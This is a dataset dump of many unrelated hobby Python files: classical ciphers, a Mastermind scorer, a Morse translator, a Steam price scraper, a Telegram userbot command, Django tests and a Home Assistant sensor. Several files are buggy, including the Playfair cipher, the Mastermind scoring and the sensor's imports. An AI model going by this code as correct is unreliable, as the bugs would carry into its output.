\"Key must be no shorter than msg.\"\n res = ''\n for i in range(len(m)):\n res += getKey(m[i], key[i])\n return res\n\n\ndef bitOtp(m: str, key: str) -> str:\n '''\n # Bit One-Time Pad\n Use **XOR** to encrypt and decrypt.\n @param `m`: bit stream\n @param `key`: bit stream, which should be no shorter \n than `m`, only the first `len(m)` bits \n will be used.\n '''\n def xor(a: str, b: str) -> str:\n return '0' if (a == '1' and b == '1') or (a == '0' and b == '0') else '1'\n\n assert len(key) >= len(m), 'Key should be no shorter than msg.'\n res = ''\n for i in range(len(m)):\n res += xor(m[i], key[i])\n return res\n\n\ndef playfair(m: str, key: str) -> str:\n # TODO: 1) implement decryption, 2) optimize code, 3) deal with key has I/J, 4) fix bugs\n '''Playfair Ciphers'''\n assert len(key) <= 25, \"Not support longer key for now.\"\n assert 'I' in key or 'i' in key or 'J' in key or 'j' in key, \"Not support key with 'i' or 'j' for new.\"\n\n # Build table\n key = key.upper()\n table = list(key)\n\n for i in range(ord('A'), ord('Z')+1):\n c = chr(i)\n\n # Deal with 'I/J'\n if c == 'I' or c == 'J':\n # if key has I or J\n if 'I' in key or 'J' in key:\n continue\n # if key has neither I nor J\n elif c == 'J': # if curr char is J\n continue\n else: # if curr char is I\n pass\n\n if c not in key:\n table.append(c)\n\n # Main\n filler = 'X'\n res = ''\n for i in range(0, len(m), 2):\n pair = m[i:i+2]\n if pair[0] == pair[1]:\n pair[1] = filler\n\n i1, i2 = table.index(pair[0]), table.index(pair[1])\n # If pair in the same row\n\n def sameRow(a: int, b: int) -> bool:\n return int(a / 5) == int(b / 5)\n if sameRow(i1, i2):\n newI1, newI2 = i1+1, i2+1\n if not sameRow(i1, newI1):\n newI1 -= 5\n if not sameRow(i2, newI2):\n newI2 -= 5\n pair[0] = table[newI1]\n pair[1] = table[newI2]\n\n # If pair in the same column\n elif i1 % 5 == i2 % 5:\n pair[0] = table[(i1+5) % 25]\n pair[1] = table[(i2+5) % 25]\n\n # Otherwise\n else:\n # row(newI1) = row(i1), col(newI1) = col(i2). Same to newI2\n rw = int(i1 / 5)\n for i in range(5*rw, 5*rw+5):\n if i % 5 == i2 % 5:\n pair[0] = table[i]\n\n rw = int(i2 / 5)\n for i in range(5*rw, 5*rw+5):\n if i % 5 == i1 % 5:\n pair[1] = table[i]\n\n res += pair\n\n return res\n\n\ndef freqAttack(ciphertext: str, specialMap: dict) -> str:\n # TODO: allow hardcoded special map\n '''Try Statistical cryptanalysis to crack the ciphertext.'''\n letterFreq = dict(zip(\n 'abcdefghijklmnopqrstuvwxyz',\n [\n 8.2, 1.5, 2.8, 4.3, 12.7,\n 2.2, 2.0, 6.1, 7.0, 0.2,\n 0.8, 4.0, 2.4, 6.7, 7.5,\n 1.9, 0.1, 6.0, 6.3, 9.1,\n 2.8, 1.0, 2.4, 0.2, 2.0,\n 0.1\n ]\n ))\n\n # e t a o i n s h r d l c u m w f g y p b v k j x q z\n orderLetterFreq = [c for c, _ in sorted(\n letterFreq.items(), key=lambda item: item[1], reverse=True)]\n # print('English freq:', ' '.join(orderLetterFreq))\n print('English freq: ', end='')\n for e in orderLetterFreq:\n print('{} '.format(e), end='')\n print()\n\n textFreq = {}\n for c in ciphertext:\n if not c.isalnum():\n continue\n if c in textFreq.keys():\n textFreq[c] += 1\n else:\n textFreq[c] = 1\n orderedTextFreq = dict(sorted(\n textFreq.items(), key=lambda item: item[1], reverse=True))\n # print('Text freq :', ' '.join(orderedTextFreq.keys()))\n print('Text freq : ', end='')\n for e in orderedTextFreq.keys():\n print('{} '.format(e), end='')\n print()\n # print('Appear count:', ' '.join([str(v) for v in orderedTextFreq.values()]))\n print('Appear count: ', end='')\n for e in orderedTextFreq.values():\n print('{:2>} '.format(e), end='')\n print()\n\n orderedTextFreq = list(orderedTextFreq.keys())\n crackMap = dict(zip(orderedTextFreq, orderLetterFreq))\n symbols = ' !@#$%^&*(),./;\\'[]\\\\<>?:\"{}|`~'\n # return ''.join([crackMap[c] if c not in symbols else c for c in ciphertext])\n\n res = ''\n for c in ciphertext:\n if c in symbols:\n res += c\n else:\n res += crackMap[c]\n\n return res\n\n\nif __name__ == '__main__':\n plaintext = 'I love eating 114514 apples.'\n\n def pRes(cipherName, encrypted, decrypted, plaintext=plaintext):\n print(f\"===== {cipherName} =====\")\n print(\"Plaintext:\", plaintext)\n print(\"Encrypted:\", encrypted)\n print(\"Decrypted:\", decrypted)\n print(\"Success :)\" if decrypted == plaintext else \"Failed ;(\")\n print()\n\n def testCaesar():\n enc = caesar(plaintext, 3)\n dec = caesar(enc, -3)\n pRes('Caesar Cipher', enc, dec)\n # testCaesar()/\n\n def testMonoalpha():\n mapfrom = 'abcdefghijklmnopqrstuvwxyz1234567890' + \\\n 'abcdefghijklmnopqrstuvwxyz1234567890'.upper()\n mapto = 'DKVQFIBJWPESCXHTMYAUOLRGZN!@#$%^&*()'.lower() + \\\n 'DKVQFIBJWPESCXHTMYAUOLRGZN!@#$%^&*()'\n enc = monoalpha(plaintext, mapfrom, mapto)\n dec = monoalpha(enc, mapto, mapfrom)\n pRes('Monoalphabetic Substitution Cipher', enc, dec)\n # testMonoalpha()\n\n # TODO: finish this\n def testVigenere():\n text = 'attackatdawn'\n key = 'lemon'\n enc = vigenere(text, key, True)\n dec = vigenere(enc, key, False)\n pRes('Vigenere Cipher', enc, dec, text.upper())\n # testVigenere()\n\n def testFreqAttack():\n ciphertext = 'BQWE UQPY LOKATNEP Q LVFPTWQX \\\nMQOOTEO JK BXHTNP QZN XQORE LQOJTWXE NOKLXEJP PHORTWQX \\\nUQPY TP Q JFLE KB BQWE UQPY WKUUKZXF HPEN SVEZ HPEN \\\nLOKLEOXF PHORTWQX UQPYP WQZ LOEAEZJ TZBEWJTKZP \\\nJOQZPUTJJEN MF OEPLTOQJKOF NOKLXEJP'\n # print(freqAttack(ciphertext, {}))\n freqAttack(ciphertext, {})\n # testFreqAttack()\n\n # print(playfair('balloon', 'monarchy'))\n","repo_name":"X3vvv/cryptology","sub_path":"classicalCiphers.py","file_name":"classicalCiphers.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23220591850","text":"\"\"\"\nMastermind\nThe classic game of Mastermind is played on a tray on which the Mastermind conceals a code and the Guesser has 10 tries to guess it. The code is a sequence of 4 (or 6, sometimes more) pegs of different colors. Each guess is a corresponding sequence of 4 (or more) pegs of different colors. A guess is \"correct\" when the color of every peg in the guess exactly matches the corresponding peg in the Mastermind's code.\n\nAfter each guess by the Guesser, the Mastermind will give a score comprising black & white pegs, not arranged in any order:\n\nBlack peg == guess peg matches the color of a code peg in the same position.\nWhite peg == guess peg matches the color of a code peg in another position.\nCreate a function that takes two strings, code and guess as arguments, and returns the score in a dictionary.\n\nThe code and guess are strings of numeric digits\nThe color of the pegs are represented by numeric digits\nno \"peg\" may be double-scored\nExamples\nguess_score(\"1423\", \"5678\") ➞ {\"black\": 0, \"white\": 0}\n\nguess_score(\"1423\", \"2222\") ➞ {\"black\": 1, \"white\": 0}\n\nguess_score(\"1423\", \"1234\") ➞ {\"black\": 1, \"white\": 3}\n\nguess_score(\"1423\", \"2211\") ➞ {\"black\": 0, \"white\": 2}\nNotes\nThe code and guess sequences will have the same length.\nThe \"pegs\" consists of only digits from 0-9.\n\"\"\"\ndef guess_score(code, guess):\n a = list(code)\n b = list(guess)\n \n d ={}\n c, e = [], []\n\n for i in range(len(a)):\n if a[i] == b[i]:\n print(\"i\", \"=\",b[i])\n c.append(a[i])\n else:\n if a[i] in b:\n e.append(i) \n \n d = {\"black\": len(c) ,\"white\": len(e) } \n\n return (d)\n\n\n#guess_score(\"1423\", \"5678\") #➞ {\"black\": 0, \"white\": 0}\n#guess_score(\"1423\", \"2222\") #➞ {\"black\": 1, \"white\": 0}\n#guess_score(\"1423\", \"1234\") #➞ {\"black\": 1, \"white\": 3}\nguess_score(\"1423\", \"2211\") #➞ {\"black\": 0, \"white\": 2}\n#guess_score(\"2928\", \"7722\") # {\"black\": 1, \"white\": 1}\n#guess_score(\"4845\", \"6446\") # {\"black\": 1, \"white\": 1}","repo_name":"mankarali/TRAINING","sub_path":"EXAMPLES/EDABIT/EXPERT/001_100/14_mastermind.py","file_name":"14_mastermind.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"6141537102","text":"#Queston3\n\ndef Merge(l_1, l_2):\n final_list = l_1 + l_2\n final_list.sort()\n return(final_list)\n \nl_1 = [1,2,3,4,5,6]\nl_2 = [3,4,5,6,7,8,10]\nprint(Merge(l_1, l_2))","repo_name":"Changopresto16/Area-Circumference","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73353080096","text":"import argparse\r\nimport os\r\nimport time\r\n\r\nimport tensorflow as tf\r\n\r\nfrom actorCritic import ActorCritic\r\nfrom environment import *\r\nfrom utils import get_checkpoint_path\r\n\r\nenv = Environment()\r\nsession = tf.Session()\r\nagent = ActorCritic(session)\r\n\r\npygame.init() # Intializes the pygame\r\ngames_scores = [] # List that will contain the score of each game played by the gamebot\r\n\r\n\r\nparser = argparse.ArgumentParser(description='DQN-snake testing.')\r\n\r\nparser.add_argument('--numberOfGames', type=int, required=False, default=10,\r\n help='Number of test games.')\r\n\r\nparser.add_argument('--slowDownFactor', type=float, required=False, default=0.06,\r\n help='The factor to make the game slow down. A value of 0 means the games is at full speed.')\r\n\r\nparser.add_argument('--modelName', type=str, required=True,\r\n help='The name of the model.')\r\n\r\n\r\ndef make_agent_play_games(n_games, slow_down_factor):\r\n \"\"\"\r\n Make the agent play a given number of games\r\n\r\n :param n_games: The number of games to play.\r\n :param slow_down_factor: Throttling to make the snake move less rapidly.\r\n :return: A list containing the score of each game played.\r\n \"\"\"\r\n episode = 0\r\n iterations_without_progress = 0\r\n max_without_progress = 200\r\n best_total = 0\r\n\r\n with session as sess:\r\n agent.saver.restore(sess, checkpoint_path) # Restore the model\r\n\r\n while episode < n_games: # Number of games that we want the robot to play\r\n time.sleep(slow_down_factor) # Make the game slow down\r\n\r\n env.render(display=True)\r\n observation = env.screenshot()\r\n cur_state = env.get_last_frames(observation)\r\n\r\n q_values = agent.predict(cur_state)\r\n action = np.argmax(q_values) # Optimal action\r\n\r\n new_state, reward, done = env.step(action)\r\n\r\n # Check if the snake makes progress in the game\r\n if env.snake.total > best_total:\r\n best_total = env.snake.total\r\n iterations_without_progress = 0\r\n else:\r\n iterations_without_progress += 1\r\n # If the snake gets stuck, the game is over\r\n if iterations_without_progress >= max_without_progress:\r\n done = True\r\n\r\n if done: # Game over, start a new game\r\n time.sleep(1)\r\n games_scores.append(env.snake.total)\r\n env.reset()\r\n episode += 1 # Increment the number of games played\r\n iterations_without_progress = 0\r\n best_total = 0\r\n\r\n return games_scores\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n args = parser.parse_args()\r\n\r\n n_games = args.numberOfGames\r\n slow_down_factor = args.slowDownFactor\r\n model_name = args.modelName\r\n checkpoint_path = get_checkpoint_path(model_name=model_name)\r\n\r\n if os.path.isfile(checkpoint_path + \".index\"): # Check to see if the model exists\r\n games_scores = make_agent_play_games(n_games, slow_down_factor)\r\n mean_score = np.mean(games_scores)\r\n std = np.std(games_scores)\r\n max_score = np.max(games_scores)\r\n\r\n print(\"Max score {:.2f}\\tMean score {:.2f}\\tStandard deviation {:.2f} \".format(max_score, mean_score, std))\r\n\r\n else:\r\n raise ValueError('Model file does not exist : a model file is required for testing')\r\n","repo_name":"benjamin-dupuis/DQN-snake","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"34"} +{"seq_id":"8639583956","text":"import re\n\n\ndef getUserInput():\n text = input(\"input text to translate... \")\n if (re.search(r'\\d', text)):\n print('invlaid input, please try again')\n getUserInput()\n else: \n translatedText = translate(text)\n print(translatedText)\n\ndef translate(textToTranslate):\n\n #creates dictionary for encoding english letters to morse code\n encodingDictionary = {\n 'A': '.-', 'B':'-...', 'C': '-.-.',\n 'D': '-..', 'E':'.', 'F': '..-.',\n 'G': '--.', 'H':'....', 'I': '..',\n 'J': '.---', 'K':'-.-', 'L': '.-..',\n 'M': '--', 'N':'-.', 'O': '---',\n 'P': '.--.', 'Q':'--.-', 'R': '.-.',\n 'S': '...', 'T':'-', 'U': '..-',\n 'V': '...-', 'W':'.--', 'X': '-..-',\n 'Y': '-.--', 'Z':'--..', ' ': '/',\n }\n\n #creates an inverse dictionary to above for decoding morse code to english letters\n decodingDictionary = {value: key for key,value in encodingDictionary.items()}\n\n #check to see if text is morse code\n if re.match('(\\s|-|\\.)+', textToTranslate):\n #decrypt each morse code letter using dictionary and place in string\n return ''.join(decodingDictionary[letter] for letter in textToTranslate.split())\n else:\n return ' '.join(encodingDictionary[letter] for letter in textToTranslate.upper())\n\nif __name__ == \"__main__\":\n getUserInput()\n\n","repo_name":"hunnain-atif/morseCodeDecoder","sub_path":"translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37055641053","text":"from time import sleep\nimport sticker_to_link_dict as sd\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport re\n\ndef get_all_prices():\n driver = webdriver.Firefox()\n stickers_dict = sd.stickers_dict_all\n total_price = 0.0\n to_check = len(stickers_dict)\n checked = 0\n for sticker_name in stickers_dict.keys():\n link = get_link(sticker_name)\n driver.get(link)\n try:\n price_text = driver.find_element_by_class_name(\"normal_price\").text\n except NoSuchElementException:\n while driver.find_elements_by_id(\"message\") and driver.find_element_by_id(\"message\").text[0:6] == \"Sorry!\":\n print(\"To many requests! Retrying in 60 seconds...\")\n sleep(60)\n print(\"Retrying...\")\n driver.get(link)\n finally:\n price_text = driver.find_element_by_class_name(\"normal_price\").text\n print(price_text)\n price = float(format(float((re.split(\" \", price_text)[2][1:]).replace(',', '')), '.2f'))\n stickers_dict[sticker_name].append(price)\n checked += 1\n print(\"checked \" + str(checked) + \" out of \" + str(to_check))\n total_price += float(format(stickers_dict[sticker_name][0] * price, '.2f'))\n driver.quit()\n return stickers_dict, str(total_price)\n\n\ndef get_link(sticker_name):\n link_base = \"https://steamcommunity.com/market/search?appid=730&q=\"\n search_query = sticker_name.replace(\" \", \"+\")\n return link_base + search_query\n","repo_name":"Gyanoo/Steam_items_price_checker","sub_path":"get_all_prices.py","file_name":"get_all_prices.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16314493026","text":"import time\n\nfrom fipper import Client, __version__ as fip_ver\nfrom fipper.types import Message\nfrom platform import python_version\n\nfrom pyAyiin import __version__, ayiin_ver\nfrom pyAyiin import CMD_HELP, HOSTED_ON, adB\nfrom pyAyiin.decorator import Ayiin\n\n\nfrom . import *\n\n\n@Ayiin([\"alive\", \"yins\"])\nasync def aliveme(client: Client, message: Message):\n chat_id = message.chat.id\n user = await client.get_me()\n output = (\n f\"**Tʜᴇ [Ayiin Ubot](https://github.com/AyiinXd/AyiinUbot)**\\n\\n\"\n f\"**{var.ALIVE_TEXT}**\\n\\n\"\n f\"╭✠╼━━━━━━━━━━━━━━━✠╮\\n\"\n f\"≽ **Bᴀsᴇ Oɴ :** •[{adB.name}]•\\n\"\n f\"≽ **Oᴡɴᴇʀ :** [{user.first_name}](tg://user?id={user.id}) \\n\"\n f\"≽ **Mᴏᴅᴜʟᴇs :** `{len(CMD_HELP)} Modules` \\n\"\n f\"≽ **Pʏᴛʜᴏɴ Vᴇʀsɪᴏɴ :** `{python_version()}`\\n\"\n f\"≽ **Pʏʀᴏɢʀᴀᴍ Vᴇʀsɪᴏɴ :** `{fip_ver}`\\n\"\n f\"≽ **Pʏ-Aʏɪɪɴ Vᴇʀsɪᴏɴ :** `{__version__}`\\n\"\n f\"≽ **Aʏɪɪɴ Vᴇʀsɪᴏɴ :** `{ayiin_ver}` [{HOSTED_ON}]\\n\"\n \"╰✠╼━━━━━━━━━━━━━━━✠╯\\n\\n\"\n )\n await message.delete()\n try:\n if var.ALIVE_PIC:\n endsw = (\".mp4\", \".gif\")\n if var.ALIVE_PIC.endswith(endsw):\n await client.send_video(chat_id=chat_id, video=var.ALIVE_PIC, caption=output)\n else:\n await client.send_photo(chat_id=chat_id, photo=var.ALIVE_PIC, caption=output)\n else:\n await message.reply_text(output)\n except BaseException as xd:\n await message.reply(xd)\n\n\nCMD_HELP.update(\n {\"alive\": (\n \"alive\",\n {\n \"alive\": \"Chech Your Userbot.\",\n }\n )\n }\n)\n","repo_name":"Arsyabot/ayiin","sub_path":"AyiinXd/alive.py","file_name":"alive.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23901481877","text":"import unittest\nimport requests\nimport copy\nfrom test_base import TestBase\n\nfrom apps.projects.models import Project\nfrom apps.ml.models import MLExperiment\nfrom apps.ml.models import MLModel\nfrom apps.accounts.models import MljarUser, Organization\n\n\nclass TestMLModel(TestBase):\n def test_create_mlmodel(self):\n token = self.create_user_and_login(self.user1_params)\n # should be empty\n organization = Organization.objects.get(slug=self.org1)\n user = MljarUser.objects.get(email=self.user1_params[\"email\"])\n project = Project(\n title=\"some title\",\n description=\"...\",\n created_by=user,\n parent_organization=organization,\n )\n project.save()\n\n ml_experiment = MLExperiment(\n title=\"exp1\",\n description=\"desc\",\n params={},\n column_usage={},\n created_by=user,\n parent_organization=organization,\n parent_project=project,\n )\n ml_experiment.save()\n\n ml_model = MLModel(\n model_key=\"exp1\",\n created_by=user,\n parent_organization=organization,\n parent_project=project,\n parent_experiment=ml_experiment,\n model_type=\"some_ml_model\",\n params={},\n training_details={},\n training_time=1,\n metric={},\n status=\"created\",\n errors={},\n task_id=\"\",\n )\n ml_model.save()\n\n self.assertEqual(len(MLModel.objects.all()), 1)\n # POST on MLModels is not allowed (HTTP 405)\n ml_model = self.request(\n \"post\",\n \"/api/v1/{0}/{1}/ml_models\".format(self.org1, project.id),\n {},\n token,\n 405,\n )\n ml_models = self.request(\n \"get\",\n \"/api/v1/{0}/{1}/ml_models\".format(self.org1, project.id),\n {},\n token,\n 200,\n )\n self.assertEqual(len(ml_models), 1)\n self.assertEqual(ml_models[0][\"model_key\"], \"exp1\")\n","repo_name":"snandasena/mljar","sub_path":"backend/tests/tests_api/test_mlmodel.py","file_name":"test_mlmodel.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25350186754","text":"# se a compra for de V=45 e o número de parcelas for P=7, então as parcelas terão valores: 7, 7, 7, 6, 6, 6 e 6. Quer\n# dizer, como o resto da divisão de 45 por 7 é 3, então as 3 parcelas iniciais devem ter valor um real maior do que as 4\n# parcelas finais. Você precisa ajudar Pedrinho e escrever um programa que, dado o valor da compra e o número de parcelas,\n# imprima os valores de cada parcela. O programa deve receber como entrada o valor de V, representando o valor da compra e\n# o valor de P, indicando o número de parcelas. A saída deve ser as parcelas.\n\ncompra = float(input(\"Digite o valor da compra: \"))\nparcelas = int(input(\"Digite o número de parcelas: \"))\n\nif(parcelas <=18):\n if(compra % parcelas == 0):\n valor_parcela = compra / parcelas\n print(\"A compra pode ser dividida em\", parcelas, \"parcelas de R$\", valor_parcela)\n else:\n numero_parcela_inicias = compra % parcelas\n valor_parcelas_iniciais = (compra // parcelas) + 1\n numero_parcela_restante = parcelas - numero_parcela_inicias\n valor_parcelas_finais = compra // parcelas\n\n print(\"A compra pode ser dividida em\", int(numero_parcela_inicias), \"parcelas iniciais de R$\",\n valor_parcelas_iniciais, \"e\", int(numero_parcela_restante), \"de R$\", valor_parcelas_finais)\nelse:\n print(\"O número de parcelas é inválido!\")","repo_name":"LyndainesSantos/DataScienceClass","sub_path":"python_condicionais/exercicio_17.py","file_name":"exercicio_17.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9224139787","text":"import unittest\nfrom dataCollection import DataCollection\nfrom book_scraper import BookScraper\nfrom author_scraper import AuthorScraper\nimport os \nfrom dotenv import load_dotenv\nload_dotenv()\n\nclass TestScraper(unittest.TestCase):\n def setUp(self):\n self.testDB = DataCollection(os.getenv('MONGO_CONNECTION_STRING'), \"testDatabase\", \"testCollection\")\n self.bookScraper = BookScraper(self.testDB)\n self.authroScraper = AuthorScraper(self.testDB)\n \n def testBookScraper(self):\n self.testDB.empty_data_collection()\n testurl = \"https://www.goodreads.com/book/show/6185.Wuthering_Heights\"\n self.bookScraper.scrape_one_book(testurl)\n self.assertEqual(1, self.testDB.get_collection_size())\n\n def testAuthorScraper(self):\n self.testDB.empty_data_collection()\n testurl = \"https://www.goodreads.com/author/show/6485178.Fredrik_Backman\"\n self.authroScraper.scrape_one_author(testurl)\n self.assertEqual(1, self.testDB.get_collection_size())\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"Roxanne1225/goodReadsScraper","sub_path":"server/testScraper.py","file_name":"testScraper.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31326583964","text":"from datetime import timedelta\r\nimport logging\r\n\r\nfrom homeassistant.components.sensor import (\r\n SensorDeviceClass,\r\n SensorEntity,\r\n SensorStateClass,\r\n)\r\nfrom homeassistant.const import EPA_AirQuality_HA\r\nfrom homeassistant.core import HomeAssistant\r\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\r\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\r\n\r\nfrom .const import DOMAIN\r\n\r\nSCAN_INTERVAL = timedelta(hours=1)\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nasync def async_setup_platform(\r\n hass: HomeAssistant,\r\n config: ConfigType,\r\n async_add_entities: AddEntitiesCallback,\r\n discovery_info: DiscoveryInfoType | None = None\r\n) -> None:\r\n \"\"\"Set up the sensor platform.\"\"\"\r\n async_add_entities([EPA_AirQuality_HA()])\r\n\r\nasync def async_setup_entry(hass, config_entry, async_add_devices):\r\n \"\"\"Set up the sensor from a config entry.\"\"\"\r\n async_add_devices([EPA_AirQuality_HA(hass.data[DOMAIN][config_entry.entry_id])])\r\n\r\n\r\nclass EPA_AirQuality_HA(SensorEntity):\r\n \"\"\"Representation of a Sensor.\"\"\"\r\n\r\n _attr_name = \"Air Quality\"\r\n _attr_native_unit_of_measurement = UV_INDEX\r\n _attr_state_class = SensorStateClass.MEASUREMENT\r\n\r\n def __init__(self, EPA_AirQuality_HA) -> None:\r\n self.EPA_AirQuality_HA = EPA_AirQuality_HA\r\n self._attr_unique_id = \"{suburb}_airquality\".format(suburb=EPA_AirQuality_HA.suburb)\r\n\r\n async def async_update(self) -> None:\r\n \"\"\"Fetch new state data for the sensor.\r\n This is the only method that should fetch new data for Home Assistant.\r\n \"\"\"\r\n self._attr_native_value = await self.EPA_AirQuality_HA.async_get_daily_uvindex()\r\n \r\n async def async_added_to_hass(self) -> None:\r\n await self.async_update()\r\n","repo_name":"loryanstrant/EPA_AirQuality_HA","sub_path":"custom_components/EPA_AirQuality_HA/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24619351501","text":"import os\nfrom unittest import skip\n\nfrom django.test import TestCase\nfrom django_rq import get_worker\nfrom rest_framework.test import APIClient\n\nfrom api.models import User\n\nsamplephotos_dir = os.path.abspath(\"samplephotos\")\n\n\n@skip(\"broken\")\nclass ScanPhotosTestCase(TestCase):\n def setUp(self):\n self.client_admin = APIClient()\n\n self.client_users = [APIClient() for _ in range(2)]\n\n User.objects.create_superuser(\n \"test_admin\", \"test_admin@test.com\", \"test_password\"\n )\n admin_auth_res = self.client_admin.post(\n \"/api/auth/token/obtain/\",\n {\n \"username\": \"test_admin\",\n \"password\": \"test_password\",\n },\n )\n self.client_admin.credentials(\n HTTP_AUTHORIZATION=\"Bearer \" + admin_auth_res.json()[\"access\"]\n )\n\n # enable signup as admin\n change_settings_res = self.client_admin.post(\n \"/api/sitesettings/\", {\"allow_registration\": True}\n )\n self.assertEqual(change_settings_res.json()[\"allow_registration\"], \"True\")\n self.assertEqual(change_settings_res.status_code, 200)\n\n logged_in_clients = []\n\n # sign up 6 test users\n user_ids = []\n\n for idx, client in enumerate(self.client_users):\n create_user_res = client.post(\n \"/api/user/\",\n {\n \"email\": \"test_user_{}@test.com\".format(idx),\n \"username\": \"test_user_{}\".format(idx),\n \"password\": \"test_password\",\n },\n )\n\n self.assertEqual(create_user_res.status_code, 201)\n user_ids.append(create_user_res.json()[\"id\"])\n\n login_user_res = client.post(\n \"/api/auth/token/obtain/\",\n {\n \"username\": \"test_user_{}\".format(idx),\n \"password\": \"test_password\",\n },\n )\n self.assertEqual(login_user_res.status_code, 200)\n\n client.credentials(\n HTTP_AUTHORIZATION=\"Bearer \" + login_user_res.json()[\"access\"]\n )\n logged_in_clients.append(client)\n self.client_users = logged_in_clients\n\n # set scan directories for each user as admin\n for idx, (user_id, client) in enumerate(zip(user_ids, self.client_users)):\n user_scan_directory = os.path.join(samplephotos_dir, \"test{}\".format(idx))\n self.assertNotEqual(user_scan_directory, \"\")\n patch_res = self.client_admin.patch(\n \"/api/manage/user/{}/\".format(user_id),\n {\"scan_directory\": user_scan_directory},\n )\n self.assertEqual(patch_res.json(), {})\n self.assertEqual(patch_res.status_code, 200)\n self.assertEqual(patch_res.json()[\"scan_directory\"], user_scan_directory)\n\n # make sure users are logged in\n for client in self.client_users:\n res = client.get(\"/api/photos/\")\n self.assertEqual(res.status_code, 200)\n\n # scan photos\n scan_photos_res = self.client_users[0].get(\"/api/scanphotos/\")\n self.assertEqual(scan_photos_res.status_code, 200)\n get_worker().work(burst=True)\n\n # make sure photos are imported\n get_photos_res = self.client_users[0].get(\"/api/photos/\")\n self.assertEqual(get_photos_res.status_code, 200)\n self.assertTrue(len(get_photos_res.json()[\"results\"]) > 0)\n\n # try scanning again and make sure there are no duplicate imports\n num_photos = len(get_photos_res.json()[\"results\"])\n scan_photos_res = self.client_users[0].get(\"/api/scanphotos/\")\n self.assertEqual(scan_photos_res.status_code, 200)\n get_worker().work(burst=True)\n get_photos_res = self.client_users[0].get(\"/api/photos/\")\n self.assertEqual(get_photos_res.status_code, 200)\n self.assertEqual(len(get_photos_res.json()[\"results\"]), num_photos)\n\n def test_auto_albums(self):\n \"\"\"make sure user can make auto albums, list and retrieve them\"\"\"\n # make auto albums\n auto_album_gen_res = self.client_users[0].get(\"/api/autoalbumgen/\")\n self.assertEqual(auto_album_gen_res.status_code, 200)\n get_worker().work(burst=True)\n\n # make sure auto albums are there\n auto_album_list_res = self.client_users[0].get(\"/api/albums/auto/list/\")\n self.assertEqual(auto_album_list_res.status_code, 200)\n\n # make sure user can retrieve each auto album\n for album in auto_album_list_res.json()[\"results\"]:\n auto_album_retrieve_res = self.client_users[0].get(\n \"/api/albums/auto/%d/\" % album[\"id\"]\n )\n self.assertEqual(auto_album_retrieve_res.status_code, 200)\n self.assertTrue(len(auto_album_retrieve_res.json()[\"photos\"]) > 0)\n\n # try making auto albums again and make sure there are no duplicates\n num_auto_albums = len(auto_album_list_res.json()[\"results\"])\n\n auto_album_gen_res = self.client_users[0].get(\"/api/autoalbumgen/\")\n self.assertEqual(auto_album_gen_res.status_code, 200)\n get_worker().work(burst=True)\n\n auto_album_list_res = self.client_users[0].get(\"/api/albums/auto/list/\")\n self.assertEqual(len(auto_album_list_res.json()[\"results\"]), num_auto_albums)\n\n def test_place_albums(self):\n \"\"\"make sure user can list and retrieve place albums\"\"\"\n place_album_list_res = self.client_users[0].get(\"/api/albums/place/list/\")\n self.assertEqual(place_album_list_res.status_code, 200)\n\n for album in place_album_list_res.json()[\"results\"]:\n place_album_retrieve_res = self.client_users[0].get(\n \"/api/albums/place/%d/\" % album[\"id\"]\n )\n self.assertEqual(place_album_retrieve_res.status_code, 200)\n\n def test_thing_albums(self):\n \"\"\"make sure user can list and retrieve thing albums\"\"\"\n thing_album_list_res = self.client_users[0].get(\"/api/albums/thing/list/\")\n self.assertEqual(thing_album_list_res.status_code, 200)\n\n for album in thing_album_list_res.json()[\"results\"]:\n thing_album_retrieve_res = self.client_users[0].get(\n \"/api/albums/thing/%d/\" % album[\"id\"]\n )\n self.assertEqual(thing_album_retrieve_res.status_code, 200)\n","repo_name":"kally788/librephotos","sub_path":"api/tests/test_scan_photos.py","file_name":"test_scan_photos.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"30038536769","text":"\"\"\"\nA Pythagorean triplet is a set of three natural numbers, a < b < c, \nfor which a^2 + b^2 = c^2\n\nFor example, 32 + 42 = 9 + 16 = 25 = 52.\n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\nFind the product abc.\n\"\"\"\n\nfrom math import sqrt\n\na = 1\nexit_status = 0 # for exiting while loop because i'm too stupid to figure out another way\n\nwhile a < 997:\n if exit_status == 1:\n break\n for b in range(2, 998):\n c = sqrt((a**2)+(b**2))\n triplet = [a, b, c]\n if sqrt((a**2)+(b**2)) == (1000 - a - b):\n 